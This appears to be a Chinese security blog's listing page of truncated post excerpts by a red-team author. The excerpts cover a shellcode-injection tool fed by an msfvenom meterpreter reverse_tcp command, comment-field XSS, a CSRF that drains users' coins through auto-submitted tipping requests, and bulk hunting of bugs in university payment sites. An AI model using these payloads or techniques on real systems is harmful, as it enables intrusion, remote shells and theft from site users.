许久没有更新公众号了，实在抱歉之前的QQ因为一些原因不能使用了各位可以联系本人的新QQ1024006555由于暂时没有什么好的案例用于写文章，在此分享一个本人写的小工具可一键生成python发包代码，生成代码可自定义简单抓一个post登录包把参数都复制到对应的输入框，然后点击生成就行了在这里可以设置生成后的代码， data header会自动排序好，只需要自定义处理代码即可默认的代

本文转载自微信公众号《天外域》，由本人原创！许久没有发文章了，在几篇文章中看到一些同学挺想我的 那就发一篇之前的文章吧，在公众号不让发 被封了 哎~因为之前在i春秋讲课，在个人介绍哪里写了本人是职业红队然后就有业务找上门了，让我对一个虚拟币的交易所进行一个渗透测试这里直接打开项目方发过来的网站，首页是一个登录页面直接注册需要受到上级邀请才能注册，点击注册回跳转到 /register/，

该篇文章转载自微信公众号《天外域》，由本人原创转载地址：https://mp.weixin.qq.com/s?__biz=MzkwNDE5ODUyMw==&mid=2247483694&idx=1&sn=6bf2aa32446ddd449826e8fe36e3edac&chksm=c08be13af7fc682cf2cf509d2b80650e86b07765ce

文章转载自《通过听觉入侵你》，由本人原创本次给大家带来一款本人写的小工具可自定义shellcode注入任意进程，并且可生产对应的代码给自己的代码调用这里第二个输入框，可以直接输入msf生成的payload就会自动转换成易语言可调用的机器码，可以用此来直接注入指定的进程msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.93.

前言:此漏洞已提交给管理员，已经修复！转载自微信公众号《通过听觉入侵你》，由本人原创今天是这样的，我习惯性的对某篇文章进行了评论，但是感觉描述的不太好 我又想撤回，这是我发现可以重新编辑，并且可以写html代码这时，我就在想 能不能利用评论来复现一些漏洞呢于是这里我尝试了一下写一个img标签来向百度发起请求<p> 6666 <img src="http://www.ba

首先我找了一篇文章，然后赞赏这里抓住赞赏的包发起赞赏的包没有任何校验，POST类型这里看下返回值 返回值success如果为true则赞赏成功 这里利用burp抓住此包，然后生成csrf代码 在尝试点击以下， 赞赏成功 这里可以利用js进行自动点击burp生成的csrf代码的button 即可实现点击url便盗走你全部的金币！这不奖励一千个金币不得行

我本来正在沉迷在学习的海洋中不能自拔(跟傻逼群友吹牛批)就在这时…………………………………….嘘,不要出声 你听 你仔细听我电脑登录的微信忽然发出一长串诡异的声音“浙江温州，浙江温州，最大皮革厂江南皮革厂倒闭了！老板黄鹤吃喝嫖赌，欠下了 3.5 个亿，带着他的小姨子跑了。我们没有办法，拿着钱包抵工资。原价都是三百多、二百多、一百多的钱包，通通二十块，通通二十块！黄鹤你不是人，我们辛辛苦苦给你干

大家好 我是Yaoヽ药药这次给大家分享一款我自己编写的小工具可直接使用谷歌黑客语法 对接的百度接口非常好用,速度非常快,不卡顿

大家好,我是Yaoヽ药药这段时间总群里老是有朋友问我怎么挖edu的挖不动edu漏洞, 今天我就教大家如何批量挖edu漏洞0x01 首先我们通过搜索引擎搜集一下链接site:edu.cn 缴费我这个人很贪财所以 关键词为”缴费”这里可以看到一个电子科技大学缴费平台url:http://cwjf.uestc.edu.cn/payment 电子科技大学缴费平台0x02这里我注册了两个账号账号

大家好,我是 Yaoヽ药药由上一篇文章 [ 一套组合拳黑进emlog6.0后台拿getshell ]中的emlog存在的xss漏洞写一篇漏洞分析以及如何修复上一篇文章地址:https://hackbar.im/?post=11 (如果不允许出现外联,请联系删除此链接)0x01首先使用f12抓添加友联的包 可以看到提交地址是link.php?action=addlink在admin目录0x